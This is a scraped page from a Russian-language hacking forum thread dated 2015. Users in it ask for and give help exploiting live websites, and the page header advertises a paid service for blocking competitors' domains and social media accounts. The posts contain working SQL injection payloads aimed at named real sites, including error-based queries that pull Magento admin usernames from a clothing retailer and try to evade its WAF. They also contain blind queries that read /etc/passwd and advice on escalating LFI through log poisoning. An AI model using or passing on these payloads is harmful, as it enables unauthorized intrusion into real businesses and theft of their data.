УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2436 из 2438

2436

Опции темы

Поиск в этой теме

Опции просмотра

#24351

22.04.2015, 11:21

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от vikler

vikler said:
↑
Ребяяяяяяят, подскажите, можно тут как-то раскрутить? Ни разу не раскручивала подобного рода

Код:

Code:
http://photo{REMOVE}vogue.arta{REMOVE}ndcommerce.com/res{REMOVE}ults.php?type=search&search=fashion+or+beauty'&sortby=dtc&page=2

из запроса вырезаются кавычки, но перед этим экранируются - поэтому и появляется ошибка. однако внедирть ничего после кавычки не вышло

#24352

22.04.2015, 11:48

sunnyfruit

Guest

Сообщений: n/a

Провел на форуме:
5548

Репутация: 0

Цитата:

Сообщение от faza02

faza02 said:
↑
как минимум нужен инклуд, да. все остальное стандартно, пытайтесь записать ваш код в еррор логи, ацес логи, логи авторизации
http://itix.pp.ua/2013/01/06/безопасность-null-byte-lfi-local-file-include-и-rfi-remote-file-include/
у вас lfi?

Да, LFI

акксесс логи обновляются каждый раз при заходе с 1 компа на любую веб страницу сайта + картинки, логи как минимум от 100мб и наврятли подлежат адекватному инклуду

Еррор логи я думаю меньше намного и иклудить стоит именно их.

А где логи авторизации хранятся?

#24353

22.04.2015, 12:45

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от sunnyfruit

sunnyfruit said:
↑
Да, LFI
акксесс логи обновляются каждый раз при заходе с 1 компа на любую веб страницу сайта + картинки, логи как минимум от 100мб и наврятли подлежат адекватному инклуду
Еррор логи я думаю меньше намного и иклудить стоит именно их.
А где логи авторизации хранятся?

http://www.lanmaster53.com/2011/05/l...ion-using-ssh/

посмотрите еще соседей, возможно получится проинклудить что-нибудь у них. в error_log, обычно, пишется refferer

совсем забыл: https://rdot.org/forum/showthread.php?t=1134

#24354

22.04.2015, 16:39

sunnyfruit

Guest

Сообщений: n/a

Провел на форуме:
5548

Репутация: 0

Цитата:

Сообщение от faza02

faza02 said:
↑
http://www.lanmaster53.com/2011/05/l...ion-using-ssh/
посмотрите еще соседей, возможно получится проинклудить что-нибудь у них. в error_log, обычно, пишется refferer
совсем забыл:
https://rdot.org/forum/showthread.php?t=1134

Первая статья кул!

Со второй статьей не понял.

Идет речь о замедленной передаче $_FILES в temp директорию?

Что за файл /tmp/lastline?

#24355

22.04.2015, 16:46

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от sunnyfruit

sunnyfruit said:
↑
Первая статья кул!
Со второй статьей не понял.
Идет речь о замедленной передаче $_FILES в temp директорию?
Что за файл /tmp/lastline?

оттуда вам нужен только сплойт. https://rdot.org/forum/showpost.php?...4&postcount=11

указываете путь до phpinfo, /etc/passwd и запускаете

#24356

23.04.2015, 03:42

palec2006

Guest

Сообщений: n/a

Провел на форуме:
9263

Репутация: 8

помогите люди добрые.

слепая:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#DD0000"]'or(if(load_file('[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]passwd[/COLOR][COLOR="#DD0000"]') is not NULL,sleep(1),0))or'[/COLOR][/COLOR]

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#DD0000"]'or(if(ascii(substring((load_file('[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]passwd[/COLOR][COLOR="#DD0000"]')),461))>=117,sleep(1),0))or'[/COLOR][/COLOR]

фильтрации нет, пролазит всё,

обрезать or' не могу

с заливкой борода:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#DD0000"]'or(select 1 into outfile '[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tmp[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1.txt[/COLOR][COLOR="#DD0000"]')or'[/COLOR][/COLOR]

не дает результата

есть варианты залится?

#24357

23.04.2015, 08:53

Br@!ns

Guest

Сообщений: n/a

Провел на форуме:
179197

Репутация: 25

Код:

Code:
https://www.childsplayclothing.co.uk/designers/pr'*updatexml(1,concat(0x3A,(select+database())),1)*'

Помогите составить запрос, чтоб вытащить имена таблиц. Непонятно что фильтруется.

Код:

Code:
https://www.childsplayclothing.co.uk/designers/pr'*updatexml(1,concat(0x3A,(select+table_name+from+infromation_schema.tables+limit+0,1)),1)*'

результата не дает.

#24358

23.04.2015, 10:55

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от Br@!ns

Br@!ns said:
↑

Код:

Code:
https://www.childsplayclothing.co.uk/designers/pr'*updatexml(1,concat(0x3A,(select+database())),1)*'

Помогите составить запрос, чтоб вытащить имена таблиц. Непонятно что фильтруется.

Код:

Code:
https://www.childsplayclothing.co.uk/designers/pr'*updatexml(1,concat(0x3A,(select+table_name+from+infromation_schema.tables+limit+0,1)),1)*'

результата не дает.

Код:

Code:
https://www.childsplayclothing.co.uk/designers/pr'*updatexml(1,concat(0x3A,(select(group_concat(table_name))from(information_schema.tables))),1)*'

Цитата:

Сообщение от palec2006

palec2006 said:
↑
помогите люди добрые.
слепая:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#DD0000"]'or(if(load_file('[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]passwd[/COLOR][COLOR="#DD0000"]') is not NULL,sleep(1),0))or'[/COLOR][/COLOR]

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#DD0000"]'or(if(ascii(substring((load_file('[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]passwd[/COLOR][COLOR="#DD0000"]')),461))>=117,sleep(1),0))or'[/COLOR][/COLOR]

фильтрации нет, пролазит всё,
обрезать
or'
не могу
с заливкой борода:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#DD0000"]'or(select 1 into outfile '[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tmp[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1.txt[/COLOR][COLOR="#DD0000"]')or'[/COLOR][/COLOR]

не дает результата
есть варианты залится?

дайте ссылку глянуть

#24359

23.04.2015, 11:08

palec2006

Guest

Сообщений: n/a

Провел на форуме:
9263

Репутация: 8

Цитата:

Сообщение от faza02

faza02 said:
↑
дайте ссылку глянуть

извините, слишком жирный рес чтоб светить

#24360

24.04.2015, 03:23

Br@!ns

Guest

Сообщений: n/a

Провел на форуме:
179197

Репутация: 25

нужный запрос:

Код:

Code:
https://www.childsplayclothing.co.uk/designers/pr'*updatexml(1,concat(0x3A,(select(mid(group_concat(username),1,1032))from(magento_admin_user))),1)*'

WAF запрещает последовательные записи в url строке select и admin_user как я понял

Помогите выполнить запрос

Страница 2436 из 2438

2436

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Сценарии/CMF/СMS	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход